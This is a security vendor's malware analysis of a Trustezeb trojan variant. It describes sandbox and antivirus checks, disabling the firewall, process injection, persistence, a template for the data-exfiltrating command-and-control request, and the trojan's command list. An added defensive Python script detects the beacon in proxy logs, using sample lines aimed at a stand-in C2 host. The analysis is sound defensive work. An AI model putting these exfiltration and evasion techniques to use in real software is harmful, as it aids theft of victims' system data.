A new Trustezeb variant spammed in the wild (Aug 30, 2013)

The Dell SonicWall Threats Research team has observed incidents of a new Trustezeb variant being delivered via e-mail spam and drive-by downloads in the wild. The malware executable is compiled in Microsoft Visual C++ and contains two malicious executables embedded in it that get run on the target machine. The dropped executable sends sensitive information to a remote server and waits for further commands.

Sample e-mail containing the new Trustezeb variant as an attachment:

Infection Cycle:

Upon execution, the Trojan takes a snapshot of the running processes and checks for the presence of the Sandboxie environment as well as the Avast antivirus program:

The Trojan creates a mutex UACMutexxxxx to mark its presence on the system.

It attempts to stop the Microsoft Windows firewall by running the following command:

The Trojan then creates a new process, svchost.exe, injects one of the two embedded executables (which it decrypts at runtime) into it, and runs it. The newly created process checks whether its parent process is running from the %Temp% folder and whether the parent's extension is .pre. If not, it drops a copy of the original malware executable into the %Temp% directory as (RandomName).pre and runs it. The infection cycle can be seen below:

The Trojan creates a registry entry to ensure that it runs on system reboot.

The dropped malware executable that gets injected into svchost.exe gathers sensitive information on the target machine and reports it back to the Command & Control server in encrypted form via an HTTP GET request. The format of the GET request used by the malware:

    GET /img_cache.php?text=(RANDOMLY GENERATED KEY BLOCK)&img_url=http://(SENSITIVE SYSTEM DATA).(bmp/jpg/png/pcx)&rpt=simage&pos=(INT)

A sample request looks like the following:

The decrypted version of the data being transmitted in above request contains the following information:

    DISKVOLUME_INFO USERNAME:USERID:OPERATING_SYSTEM:SYSTEM_DEFAULT_LANGUAGE_ID:OS_VERSION
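As an added defender-side example (not part of the original SonicWall write-up), the following Python checks request URLs against the check-in format described above and runs it over a few constructed proxy-log lines; the log layout, hostnames and parameter values are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Beacon shape from the write-up: /img_cache.php with text=, img_url=http://...,
# rpt=simage and an integer pos=, where img_url ends in bmp/jpg/png/pcx.
BEACON_PATH = "/img_cache.php"
IMG_EXT_RE = re.compile(r"\.(bmp|jpg|png|pcx)$", re.IGNORECASE)


def is_trustezeb_beacon(url: str) -> bool:
    """Return True if a request URL matches the Trustezeb check-in format."""
    parts = urlsplit(url)
    if not parts.path.endswith(BEACON_PATH):
        return False
    q = parse_qs(parts.query, keep_blank_values=True)
    if q.get("rpt") != ["simage"]:
        return False
    if "text" not in q or "img_url" not in q:
        return False
    pos = q.get("pos", [""])[0]
    if not pos.isdigit():
        return False
    img_url = q["img_url"][0]
    return img_url.startswith("http://") and bool(IMG_EXT_RE.search(img_url))


def scan_proxy_log(lines):
    """Return (client, url) pairs for 'client method url' log lines that match."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 3:
            continue
        client, method, url = fields[0], fields[1], fields[2]
        if method == "GET" and is_trustezeb_beacon(url):
            hits.append((client, url))
    return hits


# Constructed sample log lines (hostnames and values are illustrative, not real IoCs).
SAMPLE_LOG = [
    "10.0.0.5 GET http://cdn.example.test/images/logo.png",
    "10.0.0.7 GET http://c2.example.test/img_cache.php?text=AbCd1234&img_url=http://Q2FkZQ.jpg&rpt=simage&pos=3",
    "10.0.0.9 GET http://c2.example.test/img_cache.php?text=AbCd&img_url=http://x.gif&rpt=simage&pos=1",
]

if __name__ == "__main__":
    for client, url in scan_proxy_log(SAMPLE_LOG):
        print(f"possible Trustezeb check-in from {client}: {url}")
```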

A list of hardcoded Command & Control servers extracted during our analysis can be seen below:

The malicious process then waits for commands from the remote server. We saw support for the following commands in the injected code:

  • URLS
  • UPGRADE
  • UPGRADEURL
  • EXECUTE
  • LOAD
  • EXECDLL
  • LOADDLL
  • WAIT
  • KILL
  • MAINER
  • MAINERFILE

Dell SonicWALL Gateway AntiVirus provides protection against this threat via the following signature:

  • GAV: Trustezeb.E (Trojan)